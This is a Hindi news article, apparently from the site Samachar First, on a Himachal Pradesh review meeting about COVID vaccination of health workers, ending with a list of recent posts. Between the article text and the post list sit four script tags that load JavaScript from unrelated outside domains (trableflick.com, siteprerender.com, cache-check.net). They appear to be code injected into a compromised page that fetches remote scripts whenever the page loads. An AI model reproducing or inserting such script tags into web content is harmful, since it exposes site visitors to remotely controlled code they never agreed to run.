Categories: हिमाचल

25 फरवरी स्वास्थ्य देखभाल कार्यकर्ताओं के टीकाकरण का अन्तिम दिन

<p>राष्ट्रीय स्वास्थ्य मिशन हिमाचल प्रदेश के मिशन डायरेक्टर डॉ. निपुण जिन्दल की अध्यक्षता में कोविड वैक्सिनेशन ड्राईव की समीक्षा बैठक आयोजित हुई। बैठक के दौरान डॉ. निपुण जिन्दल ने सभी जिलों को अवगत करवाया कि 25 फरवरी, 2021 स्वास्थ्य देखभाल कार्यकर्ताओं के टिकाकरण के चरण का अन्तिम दिन होगा। जिलों के साथ जिलावार कवरेज भी साझा कर ली गई है। सभी मुख्य चिकित्सा अधिकारियों को ऐसे सभी स्वास्थ्य देखभाल कार्यकर्ताओं की सूची तैयार करने के निर्देश दिए है, जो कोविड पोर्टल में पंजीकृत है लेकिन अब तक टिकाकरण की पहली खुराक नहीं प्राप्त कर पाए हैं। उन्होंने सभी जिला के मुख्य चिकित्सा अधिकारियों को निर्देश दिए कि स्वास्थ्य देखभाल कार्यकर्ताओं की अधिकतम कवरेज सुनिश्चित करने के लिए आवश्यकता के अनुसार ऐसे सभी छूटे हुए लाभार्थियों के लिए सत्र बनाएं।</p>

<p>डॉ. निपुण जिन्दल ने सभी मुख्य चिकित्सा अधिकारियों को छूटे हुए लाभार्थियों का आंकलन करने और खंडवार कवरेज का विश्लेषण तथा समीक्षा करने के लिए सभी खण्ड चिकित्सा अधिकारियों को सम्बन्धित खण्डों में सत्र आयोजित करने के निर्देश दिए। छूटे हुए लाभार्थियों तक पहुंचने के लिए संचार के सभी उपलब्ध साधनों का उपयोग किया जाना चाहिए। उन्होंने बताया कि कोविड वैक्सीन की पहली खुराक प्राप्त करने के लिए सभी स्वास्थ्य देखभाल कार्यकर्ताओं के लिए यह अन्तिम अवसर होगा। उन्होंने सभी पंजीकृत लेकिन किन्हीं कारणों से टिकाकरण नहीं किए गए स्वास्थ्य कार्यकर्ताओं से 25 फरवरी, 2021 को अपने निकटतम टिकाकरण स्थल पर जाकर टिकाकरण के निर्धारण के लिए एसएमएस प्राप्त न होने के बावजूद भी टिकाकरण करवाने का आग्रह किया। ऐसे लाभार्थियों का टिकाकरण स्थल पर ही निर्धारित किया जाएगा।</p>

<p>उन्होंने आगे बताया कि अब तक प्रदेश में 78 प्रतिशत से अधिक पंजीकृत स्वास्थ्य देखभाल कार्यकर्ताओं का टीकाकरण किया जा चुका है। अब तक केवल 0.5 प्रतिशत एईएफआई मामले सामने आए हैं जिनमें से केवल एक को अस्पताल में भर्ती करवाने की आवश्यकता पड़ी है। उन्होंने सभी लाभार्थियों को किसी भी अफवाह पर ध्यान न देने और स्वयं को टीका लगवाने के लिए आगे आने का आग्रह किया है, क्योंकि यह वैक्सीन पूरी तरह से सुरक्षित है। डॉ. जिन्दल ने बताया कि हिमाचल प्रदेश स्वास्थ्य देखभाल कार्यकर्ताओं को दूसरी खुराक प्रदान करने में अधिकतम कवरेज करने में 91 प्रतिशत से अधिक लक्ष्य हासिल करने वाला देश का अग्रणी राज्य है।</p>

<p></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1614220832937″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

चीन के ड्रोन बार-बार भारत में घुस रहे हैं, किन्नौर के विधायक का दावा

  Indo-China border security concerns: हिमाचल प्रदेश के किन्नौर जिले में इंडो-चाइना बॉर्डर पर चीन…

6 hours ago

Kangra News: राज्यपाल ने किया वजीर राम सिंह पठानिया की प्रतिमा का अनावरण, वीरगति प्राप्त नायक को दी श्रद्धांजलि

  Wazir Ram Singh Pathania: कांगड़ा जिले के नूरपुर उपमंडल में शनिवार को राज्यपाल ने…

7 hours ago

Himachal: हिमाचल में शिक्षा मॉडल की पुनर्स्थापना की तैयारी: रोहित ठाकुर

रैत में अंडर-19 राज्य स्तरीय खेलकूद प्रतियोगिता का समापन: शिक्षा मंत्री ने विजेताओं को किया…

7 hours ago

IGMC कैंसर सेंटर उद्घाटन पर सुक्‍खू-जयराम में सियासी तकरार

  Political Tension Escalates:  हिमाचल प्रदेश में कांग्रेस और भाजपा के बीच आरोप-प्रत्यारोप का सिलसिला…

7 hours ago

IGMC में टर्शरी कैंसर केयर सेंटर का उद्घाटन,  दो माह में लगेगी PET स्कैन मशीन

Shimla:  मुख्यमंत्री सुखविंदर सिंह सुक्खू ने आज IGMC शिमला में टर्शरी कैंसर केयर सेंटर का…

7 hours ago

द हंस फाऊंडेशन एमएमयू 2 बंजार द्वारा सामान्य चिकित्सा शिविर का अयोजन

एमएमयू इकाई 2 बंजार के द्वारा राजकीय वरिष्ठ माध्यमिक पाठशाला कनौन में किशोरियों को सामाजिक…

11 hours ago